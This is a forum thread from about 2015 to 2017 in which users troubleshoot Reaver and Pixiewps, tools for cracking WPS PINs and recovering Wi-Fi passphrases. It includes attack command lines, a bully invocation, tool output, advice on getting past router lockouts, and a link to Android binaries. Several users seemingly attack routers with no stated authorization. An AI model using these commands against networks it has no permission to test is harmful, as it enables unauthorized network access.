I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

This is the output I get:



Any ideas?

Thanks!

Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.

bahha
2015-06-14, 14:09
On some Technicolor routers the modified reaver recovers the pin but not the passphrase; it freezes on

[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11
If such a thing happens, use bully to recover it,
example:
bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
It worked for me.

@Vinit2512 the RTL8671 is hackable (tested)

Azul
2015-06-15, 04:19
Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.

Thanks soxrok2212, it worked :)

mmusket33
2015-06-15, 08:54
To soxrok2212

Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

Which variable ie -vv or -vvv is supposed to provide all data?

MTeams

soxrok2212
2015-06-15, 15:24
To soxrok2212

Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

Which variable ie -vv or -vvv is supposed to provide all data?

MTeams

Make sure you are actually running the version of reaver you compile...

-vv will give you the standard Reaver 1.4 -vv output, Received M1, Sending M2, etc.

-vvv will print all the pixie dust information (PKE, PKR, E-Hash1, etc).

contevo
2015-07-19, 05:46
hello.

I managed to get 3 pins off 3 different routers, but whenever reaver goes into the second part of the cracking it just hangs at the test channel, and when I check airodump the router no longer shows WPS enabled, as if it turned off when I got the pin.
Is there a way to re-enable it? They were on before I tried reaver on them.

soxrok2212
2015-07-19, 15:54
hello.

I managed to get 3 pins off 3 different routers, but whenever reaver goes into the second part of the cracking it just hangs at the test channel, and when I check airodump the router no longer shows WPS enabled, as if it turned off when I got the pin.
Is there a way to re-enable it? They were on before I tried reaver on them.

Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?

contevo
2015-07-19, 17:26
Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?

I can't get the chipset on them because on those routers, as soon as reaver cracked the pin, they no longer show WPS enabled, and I waited a whole day in case they would come on again, but nope.

aanarchyy
2015-08-22, 23:15
Ported to Android!

Will update soon with link to build script on my github.

Binaries of pixiewps and t6x-reaver.

http://www.mediafire.com/download/bwrwn4i1c8p5881/reaver-pixie-android.tar.gz

theoctavist
2015-08-28, 06:22
having problems with the prereqs

root@kali:~# apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
unzip is already the newest version.
unzip set to manually installed.
sqlite3 is already the newest version.
sqlite3 set to manually installed.
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
libpcap-dev : Depends: libpcap0.8-dev but it is not going to be installed
libsqlite3-dev : Depends: libsqlite3-0 (= 3.7.16.2-1~bpo70+1) but 3.8.7.1-1+deb8u1 is to be installed
E: Unable to correct problems, you have held broken packages.

ravenwest
2015-11-23, 20:25
what is force mode?
"Try again with --force or with another (newer) set of data"
and how should I use it?

Laserman75
2015-11-25, 01:07
what is force mode?
"Try again with --force or with another (newer) set of data"
and how should I use it?

https://github.com/wiire/pixiewps

If the following message is shown:

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.

whitetsagan
2016-04-24, 11:57
Is anyone familiar with reaver's "wps transaction failed (0x04)?" WPS is not locked but I get this error constantly.

RAZERZDAHACKER
2016-09-16, 09:59
Thanks for the hard work with updating reaver with pixiewps, but I get an error that the WPS pin was not found and it doesn't continue. I run reaver with "reaver -i wlan0mon -b <bssid> -c 11 -K1 -vvv -S" but any combination will produce the same error.

kcdtv
2016-09-17, 21:59
If you use K1, reaver stops after M3 to try pixiewps. If the PIN is not found, launch the attack again without K1 to proceed with the normal WPS brute force.

angybar
2016-11-23, 15:15
I have a problem with the installation of reaver 1.5 because when I run ./configure, it gives me ERROR: PCAP LIBRARY NOT FOUND. I tried to install updates but nothing helped.

soxrok2212
2016-11-24, 17:31
I have a problem with the installation of reaver 1.5 because when I run ./configure, it gives me ERROR: PCAP LIBRARY NOT FOUND. I tried to install updates but nothing helped.

Read the dependencies in Reaver's Github. It will tell you everything you need to know.



apt-get update
apt-get install libpcap-dev libssl-dev libsqlite3-dev

Shadow_night1
2017-01-08, 02:37
This command used to work fine for me, but now every time it just repeatedly says, "Failed to associate.....". Did this stop working for anyone else?

mikk
2017-02-10, 18:51
Attacking an RTL8xxx, I am getting lots of "failed to associate", "timeout" and "AP rate limiting - wait 60 seconds", although the pin count rises very slowly. Pixiewps didn't work; are there switches I can use to speed up the process? The 'estimated time' fluctuates between 1 day and 10-14?